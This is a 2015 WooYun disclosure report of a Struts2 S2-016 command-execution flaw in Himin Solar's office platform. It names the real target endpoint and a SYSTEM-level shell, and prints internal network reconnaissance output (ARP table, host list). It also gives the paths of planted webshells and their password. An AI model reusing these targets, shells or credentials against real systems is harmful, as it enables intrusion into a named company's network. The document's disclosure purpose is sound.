皇明某办公平台存在命令执行漏洞可威胁内网

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145803

漏洞标题：皇明某办公平台存在命令执行漏洞可威胁内网

漏洞作者：路人甲

提交时间：2015-10-10 16:35

修复时间：2015-10-15 16:36

公开时间：2015-10-15 16:36

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-10：细节已通知厂商并且等待厂商处理中
2015-10-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

命令执行可威胁内网

详细说明：

HOP-皇明信息化办公平台-HIMIN OFFICE PLATFORM
目标地址：http://info.himin.com

Target: http://info.himin.com/messageAction!toSubSug.action
Useage: S2-016 
Whoami: nt authority\system
WebPath: D:\Tomcat 8.0\webapps\ROOT\

漏洞证明：

可威胁内网

★K8cmd-> arp -a
====================================================================================================================================
??: 192.168.3.138 --- 0x11
  Internet ??         ????              ??
  192.168.3.129         00-00-5e-00-01-07     ??        
  192.168.3.131         00-50-56-be-56-a3     ??        
  192.168.3.152         00-50-56-be-25-46     ??        
  192.168.3.153         00-50-56-be-57-41     ??        
  192.168.3.158         00-50-56-be-43-ea     ??        
  192.168.3.159         00-50-56-be-05-b3     ??        
  192.168.3.172         00-50-56-be-1e-02     ??        
  192.168.3.173         00-50-56-be-2a-8e     ??        
  192.168.3.178         00-21-85-c7-dc-00     ??        
  192.168.3.180         5c-f3-fc-dd-1a-94     ??        
  192.168.3.181         00-50-56-be-1b-57     ??        
  192.168.3.182         00-21-5e-36-16-98     ??        
  192.168.3.183         00-50-56-be-12-47     ??        
  192.168.3.187         00-50-56-be-20-7f     ??        
  192.168.3.188         60-eb-69-d2-de-5c     ??        
  192.168.3.191         ff-ff-ff-ff-ff-ff     ??        
  224.0.0.22            01-00-5e-00-00-16     ??        
  224.0.0.252           01-00-5e-00-00-fc     ??        
★K8cmd-> net view
====================================================================================================================================
?????            ??
-------------------------------------------------------------------------------
\\CGSERVER             CGserver                                                
\\CTXLIC                                                                       
\\DEVELOPER                                                                    
\\HM-DNS1                                                                      
\\HM-ECSCRM                                                                    
\\HM-ESCBC                                                                     
\\HM-EXAM                                                                      
\\HM-FTP                                                                       
\\HM-HMBC                                                                      
\\HM-HMCRM                                                                     
\\HM-HMGC                                                                      
\\HM-INFO                                                                      
\\HM-MEPAD                                                                     
\\HM-ORDER                                                                     
\\HM-QIHU                                                                      
\\HM-QINGBAO                                                                   
\\HM-RTX13                                                                     
\\HM-SVN                                                                       
\\HM-U871A                                                                     
\\HM-U8V12                                                                     
\\HM_CARD              hm_card                                                 
\\HM_WEBSITE                                                                   
\\HMSERVER                                                                     
\\HMSERVER0                                                                    
\\HMSERVER2                                                                    
\\HMSERVER3                                                                    
\\HMSERVER5                                                                    
\\HRSERVER                                                                     
\\HYDROGEN                                                                     
\\Q8415S4              NetDisk                                                 
\\QTC-PC                                                                       
\\U8BAK                NAS Management System                                   
\\UFNAS                NAS Management System                                   
\\WIN-1ISJJA1KQ2T                                                              
\\WIN-8II67SD3O58                                                              
\\WIN-SOU4L2DEP6C

上传小马：http://info.himin.com/one.jsp
小马传大马：http://info.himin.com/wpp.jsp
密码：pandas

多个数据库

涉及多个系统

修复方案：

st补丁

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-15 16:36

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145803

漏洞标题：皇明某办公平台存在命令执行漏洞可威胁内网

相关厂商：皇明太阳能

漏洞作者：路人甲

提交时间：2015-10-10 16:35

修复时间：2015-10-15 16:36

公开时间：2015-10-15 16:36

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0145803

漏洞标题：皇明某办公平台存在命令执行漏洞可威胁内网

相关厂商：皇明太阳能

漏洞作者： 路人甲

提交时间：2015-10-10 16:35

修复时间：2015-10-15 16:36

公开时间：2015-10-15 16:36

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0145803"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云